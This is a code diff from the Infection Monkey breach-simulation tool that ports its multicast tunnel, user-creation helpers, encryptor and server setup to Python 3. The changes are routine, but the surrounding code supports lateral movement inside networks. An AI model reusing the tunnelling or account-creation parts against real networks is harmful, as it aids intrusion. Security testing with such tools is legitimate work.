|
||||
httpd.timeout = 30
|
||||
while not self._stopped:
|
||||
httpd.handle_request()
|
||||
|
|
|
@ -7,9 +7,8 @@ from threading import Thread
|
|||
from infection_monkey.model import VictimHost
|
||||
from infection_monkey.network.firewall import app as firewall
|
||||
from infection_monkey.network.info import local_ips, get_free_tcp_port
|
||||
from infection_monkey.network.tools import check_tcp_port
|
||||
from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
|
||||
from infection_monkey.transport.base import get_last_serve_time
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
|
||||
__author__ = 'hoffer'
|
||||
|
||||
|
@ -48,7 +47,7 @@ def _check_tunnel(address, port, existing_sock=None):
|
|||
return False
|
||||
|
||||
try:
|
||||
sock.sendto("+", (address, MCAST_PORT))
|
||||
sock.sendto(b"+", (address, MCAST_PORT))
|
||||
except Exception as exc:
|
||||
LOG.debug("Caught exception in tunnel registration: %s", exc)
|
||||
|
||||
|
@ -71,13 +70,13 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT):
|
|||
try:
|
||||
LOG.info("Trying to find using adapter %s", adapter)
|
||||
sock = _set_multicast_socket(timeout, adapter)
|
||||
sock.sendto("?", (MCAST_GROUP, MCAST_PORT))
|
||||
sock.sendto(b"?", (MCAST_GROUP, MCAST_PORT))
|
||||
tunnels = []
|
||||
|
||||
while True:
|
||||
try:
|
||||
answer, address = sock.recvfrom(BUFFER_READ)
|
||||
if answer not in ['?', '+', '-']:
|
||||
if answer not in [b'?', b'+', b'-']:
|
||||
tunnels.append(answer)
|
||||
except socket.timeout:
|
||||
break
|
||||
|
@ -102,7 +101,7 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT):
|
|||
def quit_tunnel(address, timeout=DEFAULT_TIMEOUT):
|
||||
try:
|
||||
sock = _set_multicast_socket(timeout)
|
||||
sock.sendto("-", (address, MCAST_PORT))
|
||||
sock.sendto(b"-", (address, MCAST_PORT))
|
||||
sock.close()
|
||||
LOG.debug("Success quitting tunnel")
|
||||
except Exception as exc:
|
||||
|
@ -147,17 +146,17 @@ class MonkeyTunnel(Thread):
|
|||
while not self._stopped:
|
||||
try:
|
||||
search, address = self._broad_sock.recvfrom(BUFFER_READ)
|
||||
if '?' == search:
|
||||
if b'?' == search:
|
||||
ip_match = get_interface_to_target(address[0])
|
||||
if ip_match:
|
||||
answer = '%s:%d' % (ip_match, self.local_port)
|
||||
LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer)
|
||||
self._broad_sock.sendto(answer, (address[0], MCAST_PORT))
|
||||
elif '+' == search:
|
||||
self._broad_sock.sendto(answer.encode(), (address[0], MCAST_PORT))
|
||||
elif b'+' == search:
|
||||
if not address[0] in self._clients:
|
||||
LOG.debug("Tunnel control: Added %s to watchlist", address[0])
|
||||
self._clients.append(address[0])
|
||||
elif '-' == search:
|
||||
elif b'-' == search:
|
||||
LOG.debug("Tunnel control: Removed %s from watchlist", address[0])
|
||||
self._clients = [client for client in self._clients if client != address[0]]
|
||||
|
||||
|
@ -170,7 +169,7 @@ class MonkeyTunnel(Thread):
|
|||
while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT):
|
||||
try:
|
||||
search, address = self._broad_sock.recvfrom(BUFFER_READ)
|
||||
if '-' == search:
|
||||
if b'-' == search:
|
||||
LOG.debug("Tunnel control: Removed %s from watchlist", address[0])
|
||||
self._clients = [client for client in self._clients if client != address[0]]
|
||||
except socket.timeout:
|
||||
|
|
|
@ -4,7 +4,7 @@ import abc
|
|||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AutoNewUser:
|
||||
class AutoNewUser(metaclass=abc.ABCMeta):
|
||||
"""
|
||||
RAII object to use for creating and using a new user. Use with `with`.
|
||||
User will be created when the instance is instantiated.
|
||||
|
@ -19,7 +19,6 @@ class AutoNewUser:
|
|||
# Logged off and deleted
|
||||
...
|
||||
"""
|
||||
__metaclass__ = abc.ABCMeta
|
||||
|
||||
def __init__(self, username, password):
|
||||
self.username = username
|
||||
|
|
|
@ -6,5 +6,3 @@ def get_commands_to_add_user(username, password):
|
|||
linux_cmds = get_linux_commands_to_add_user(username)
|
||||
windows_cmds = get_windows_commands_to_add_user(username, password)
|
||||
return linux_cmds, windows_cmds
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
import monkey_island.cc.main
|
||||
from monkey_island.cc.main import main
|
||||
|
||||
if "__main__" == __name__:
|
||||
monkey_island.cc.main.main()
|
||||
main()
|
||||
|
|
|
@ -1,11 +1,8 @@
|
|||
import os
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
|
||||
import bson
|
||||
import flask_restful
|
||||
from bson.json_util import dumps
|
||||
from flask import Flask, send_from_directory, make_response, Response
|
||||
from flask import Flask, send_from_directory, Response
|
||||
from werkzeug.exceptions import NotFound
|
||||
|
||||
from monkey_island.cc.auth import init_jwt
|
||||
|
@ -29,19 +26,19 @@ from monkey_island.cc.resources.telemetry import Telemetry
|
|||
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
||||
from monkey_island.cc.resources.pba_file_download import PBAFileDownload
|
||||
from monkey_island.cc.resources.version_update import VersionUpdate
|
||||
from monkey_island.cc.services.database import Database
|
||||
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
|
||||
from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
|
||||
from monkey_island.cc.resources.pba_file_upload import FileUpload
|
||||
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
|
||||
from monkey_island.cc.resources.attack.attack_report import AttackReport
|
||||
from monkey_island.cc.services.database import Database
|
||||
from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
|
||||
from monkey_island.cc.services.representations import output_json
|
||||
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
|
||||
|
||||
from monkey_island.cc.resources.test.monkey_test import MonkeyTest
|
||||
from monkey_island.cc.resources.test.log_test import LogTest
|
||||
|
||||
__author__ = 'Barak'
|
||||
|
||||
|
||||
HOME_FILE = 'index.html'
|
||||
|
||||
|
||||
|
@ -62,32 +59,6 @@ def serve_home():
|
|||
return serve_static_file(HOME_FILE)
|
||||
|
||||
|
||||
def normalize_obj(obj):
|
||||
if '_id' in obj and not 'id' in obj:
|
||||
obj['id'] = obj['_id']
|
||||
del obj['_id']
|
||||
|
||||
for key, value in obj.items():
|
||||
if type(value) is bson.objectid.ObjectId:
|
||||
obj[key] = str(value)
|
||||
if type(value) is datetime:
|
||||
obj[key] = str(value)
|
||||
if type(value) is dict:
|
||||
obj[key] = normalize_obj(value)
|
||||
if type(value) is list:
|
||||
for i in range(0, len(value)):
|
||||
if type(value[i]) is dict:
|
||||
value[i] = normalize_obj(value[i])
|
||||
return obj
|
||||
|
||||
|
||||
def output_json(obj, code, headers=None):
|
||||
obj = normalize_obj(obj)
|
||||
resp = make_response(dumps(obj), code)
|
||||
resp.headers.extend(headers or {})
|
||||
return resp
|
||||
|
||||
|
||||
def init_app_config(app, mongo_url):
|
||||
app.config['MONGO_URI'] = mongo_url
|
||||
app.config['SECRET_KEY'] = str(uuid.getnode())
|
||||
|
|
|
@ -35,19 +35,19 @@ class Encryptor:
|
|||
return message + (self._BLOCK_SIZE - (len(message) % self._BLOCK_SIZE)) * chr(
|
||||
self._BLOCK_SIZE - (len(message) % self._BLOCK_SIZE))
|
||||
|
||||
def _unpad(self, message):
|
||||
def _unpad(self, message: str):
|
||||
return message[0:-ord(message[len(message) - 1])]
|
||||
|
||||
def enc(self, message):
|
||||
def enc(self, message: str):
|
||||
cipher_iv = Random.new().read(AES.block_size)
|
||||
cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv)
|
||||
return base64.b64encode(cipher_iv + cipher.encrypt(str(self._pad(message)))) # ciper.encrypt expects str
|
||||
return base64.b64encode(cipher_iv + cipher.encrypt(self._pad(message).encode())).decode()
|
||||
|
||||
def dec(self, enc_message):
|
||||
enc_message = base64.b64decode(enc_message)
|
||||
cipher_iv = enc_message[0:AES.block_size]
|
||||
cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv)
|
||||
return self._unpad(cipher.decrypt(enc_message[AES.block_size:]))
|
||||
return self._unpad(cipher.decrypt(enc_message[AES.block_size:]).decode())
|
||||
|
||||
|
||||
encryptor = Encryptor()
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
import abc
|
||||
from abc import ABCMeta, abstractmethod
|
||||
from datetime import timedelta
|
||||
import os
|
||||
from Crypto.Hash import SHA3_512
|
||||
|
@ -6,9 +6,7 @@ from Crypto.Hash import SHA3_512
|
|||
__author__ = 'itay.mizeretz'
|
||||
|
||||
|
||||
class Environment(object):
|
||||
__metaclass__ = abc.ABCMeta
|
||||
|
||||
class Environment(object, metaclass=ABCMeta):
|
||||
_ISLAND_PORT = 5000
|
||||
_MONGO_DB_NAME = "monkeyisland"
|
||||
_MONGO_DB_HOST = "localhost"
|
||||
|
@ -69,7 +67,7 @@ class Environment(object):
|
|||
val = self.config.get(key, val)
|
||||
return val
|
||||
|
||||
@abc.abstractmethod
|
||||
@abstractmethod
|
||||
def get_auth_users(self):
|
||||
return
|
||||
|
||||
|
|
|
@ -1,7 +1,6 @@
|
|||
import monkey_island.cc.auth
|
||||
from monkey_island.cc.environment import Environment
|
||||
from common.cloud.aws_instance import AwsInstance
|
||||
from Crypto.Hash import SHA3_512
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
|
|
|
@ -34,8 +34,8 @@ def load_server_configuration_from_file():
|
|||
|
||||
|
||||
def load_env_from_file():
|
||||
config_json = load_server_configuration_from_file()
|
||||
return config_json['server_config']
|
||||
loaded_config_json = load_server_configuration_from_file()
|
||||
return loaded_config_json['server_config']
|
||||
|
||||
|
||||
try:
|
||||
|
|
|
@ -2,7 +2,6 @@ import os
|
|||
import json
|
||||
import logging.config
|
||||
|
||||
|
||||
__author__ = 'Maor.Rayzin'
|
||||
|
||||
|
||||
|
|
|
@ -6,7 +6,6 @@
|
|||
"format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s"
|
||||
}
|
||||
},
|
||||
|
||||
"handlers": {
|
||||
"console": {
|
||||
"class": "logging.StreamHandler",
|
||||
|
@ -14,7 +13,6 @@
|
|||
"formatter": "simple",
|
||||
"stream": "ext://sys.stdout"
|
||||
},
|
||||
|
||||
"info_file_handler": {
|
||||
"class": "logging.handlers.RotatingFileHandler",
|
||||
"level": "INFO",
|
||||
|
@ -25,9 +23,11 @@
|
|||
"encoding": "utf8"
|
||||
}
|
||||
},
|
||||
|
||||
"root": {
|
||||
"level": "DEBUG",
|
||||
"handlers": ["console", "info_file_handler"]
|
||||
"handlers": [
|
||||
"console",
|
||||
"info_file_handler"
|
||||
]
|
||||
}
|
||||
}
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue